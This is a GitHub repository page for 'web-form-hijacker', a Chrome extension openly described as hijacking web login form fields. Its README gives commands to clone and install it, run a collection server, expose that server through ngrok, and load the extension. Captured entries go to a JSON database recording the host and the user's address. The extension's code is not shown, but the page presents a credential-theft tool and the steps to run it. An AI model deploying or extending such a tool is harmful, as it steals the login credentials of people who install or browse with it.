Skip to content

myungjaeyu/web-form-hijacker

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

web-form-hijacker

form hijacking chrome extension

DownLoad

NPM Version Total downloads Latest release
Alt text Alt text Alt text

Install

$ git clone https://github.com/u4bi-git/web-form-hijacker.git hi
$ cd hi
$ npm install

Usage

$ npm run server

Download ngrok (Because of SSL connection)

$ ./ngrok http 7777

Load unpacked extension (chrome://extensions)

Alt text


Login form field hijacking

Alt text

JSON DB

{
    "id"        : 1,
    "host"      : "www.example.com",
    "user_addr" : "0.0.0.0",
    ...etc
}

Alt text

Extension Icon

transparent color for the Icon

Alt text

License

MIT